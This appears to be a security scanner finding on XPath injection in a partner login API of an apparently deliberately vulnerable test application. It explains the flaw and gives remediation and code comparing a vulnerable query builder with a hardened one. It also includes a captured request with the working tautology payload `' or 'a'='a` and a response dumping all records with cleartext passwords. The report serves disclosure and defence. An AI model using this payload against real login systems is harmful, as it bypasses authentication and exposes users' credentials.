Description
XPath Injection
Severity: Critical
Discovered: 8 November 2025, 09:36 PM UTC
CWE ID
CWE-643
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Details
The target application builds an XPath query over XML data from user-controllable input without neutralizing it. By closing the string literal that holds the input and appending a tautology (`' or 'a'='a` in the request below), an attacker changes the structure of the XPath expression rather than just the value being compared, so the query matches nodes it was never meant to return. In the captured exchange this bypasses the partner login check: the response contains every record in the backing XML document, including cleartext passwords, instead of the single record matching the supplied credentials. Where query results drive updates the same technique can alter application data, and the disclosed credentials can be used to launch further attacks against this or other systems.
Possible exposure
Bypass authentication (confirmed below); Read Application Data (confirmed below: full record dump including cleartext passwords); Modify Application Data (only where the query result drives writes). XPath 1.0 itself has no side effects, so code execution is not a direct consequence of this finding.
Remediation suggestions
Never build an XPath expression by concatenating user-controllable input into it. Where the XPath engine supports variable binding (for example XPathVariableResolver in javax.xml.xpath), pass the username and password as bound variables so they can only ever be compared as values. If the engine offers no binding and the expression must be assembled from strings, remember that XPath 1.0 string literals have no escape sequence: wrap the value in whichever quote character it does not contain, and split a value containing both quote kinds with concat(). Validate identifiers such as the username against an allow-list of the expected shape before they reach the query. Independently of the injection, the response shows passwords stored and returned in cleartext; store only password hashes and never include credential fields in API responses.
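The vulnerable construction beside its hardened form, as an added example written for this issue and not the target application's own code. The element path `//partners/partner`, the allow-list pattern for usernames and the function names are assumptions; the payload is the one from the captured request below.

```javascript
// Added example, not the target application's own code.
// Assumes the records are queried with XPath 1.0 under //partners/partner
// (an assumption; the captured response is flat, so adjust the path to the
// real schema).

// Vulnerable: both parameters are spliced straight into the expression.
// With the captured payload  Heisenberg123' or 'a'='a  the predicate becomes
//   username='walter100' and password='Heisenberg123' or 'a'='a'
// and, because 'and' binds tighter than 'or', it is true for every node.
function buildLoginQueryVulnerable(username, password) {
  return `//partners/partner[username='${username}' and password='${password}']`;
}

// XPath 1.0 string literals have no escape sequence, so quoting on its own
// is not enough. A value without single quotes is wrapped in single quotes,
// one without double quotes in double quotes, and one containing both kinds
// is split on the single quote and reassembled with concat(), so no
// user-supplied character can ever terminate the literal.
function xpathLiteral(value) {
  const s = String(value);
  if (!s.includes("'")) return `'${s}'`;
  if (!s.includes('"')) return `"${s}"`;
  const pieces = s.split("'").map((p) => `'${p}'`);
  return `concat(${pieces.join(', "\'", ')})`;
}

// Allow-list for the identifier: usernames are treated as short handles
// (the pattern is an assumption), so anything else is rejected before it
// reaches the query. Passwords are free text and go through xpathLiteral().
const USERNAME_RE = /^[A-Za-z0-9_]{1,32}$/;

function buildLoginQuerySafe(username, password) {
  if (!USERNAME_RE.test(username)) {
    throw new Error('username rejected by allow-list');
  }
  return `//partners/partner[username=${xpathLiteral(username)} and password=${xpathLiteral(password)}]`;
}

// Demo with the payload from the captured request: the vulnerable query
// matches every partner, the safe one compares the whole payload as a value.
const capturedPayload = "Heisenberg123' or 'a'='a";
console.log(buildLoginQueryVulnerable('walter100', capturedPayload));
console.log(buildLoginQuerySafe('walter100', capturedPayload));
```

Where the XPath library supports bound variables, prefer them over xpathLiteral(), since the value then never touches the expression text at all. Even the safe query still selects the whole partner node, password included; select only the fields the caller needs and compare a password hash rather than the cleartext value.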
Request
GET http://docker:3000/api/partners/partnerLogin?password=Heisenberg123%27+or+%27a%27%3D%27a&username=walter100 HTTP/1.1
Cookie: bc-calls-counter=1762637789485; connect.sid=M83qZ9HPh59EkGVT6LBGJgZWR9ez-oXA.kbQSqtxgNWvbWiwyBgkWk%2B5S92cygfwfwt20LgajYNk
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.154 Safari/537.36
content-type: text/xml
Response
HTTP/1.1 200
date: Sat, 08 Nov 2025 21:36:45 GMT
Connection: close
Set-Cookie: bc-calls-counter=1762637805581; domain=docker
content-type: text/xml
Cache-Control: public, max-age=99999
content-length: 1031
x-xss-protection: 0
x-content-type-options: 1
content-security-policy: default-src * 'unsafe-inline' 'unsafe-eval'
strict-transport-security: max-age=0
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>Walter White</name>
<age>50</age>
<profession>Chemistry Teacher</profession>
<residency country="US" state="New Mexico" city="Albuquerque"/>
<username>walter100</username>
<password>Heisenberg123</password>
<wealth>15M USD</wealth>
<name>Jesse Pinkman</name>
<age>25</age>
<profession>Professional Product Distributer</profession>
<residency country="US" state="New Mexico" city="Yo Moma"/>
<username>dapinkman69</username>
<password>Yoyo1!</password>
<wealth>5M USD</wealth>
<name>Michael Ehrmantraut</name>
<age>65</age>
<profession>Personal Security Agent</profession>
<residency country="US" state="New Mexico" city="Albuquerque"/>
<username>_safetyman_</username>
<password>LittleKid777</password>
<wealth>50M USD</wealth>
<name>Gus Fring</name>
<age>52</age>
<profession>Restaurant Chain Owner</profession>
<residency country="US" state="New Mexico" city="Albuquerque"/>
<username>ChickMan</username>
<password>GoodChicken4U</password>
<wealth>Too much USD</wealth>
</root>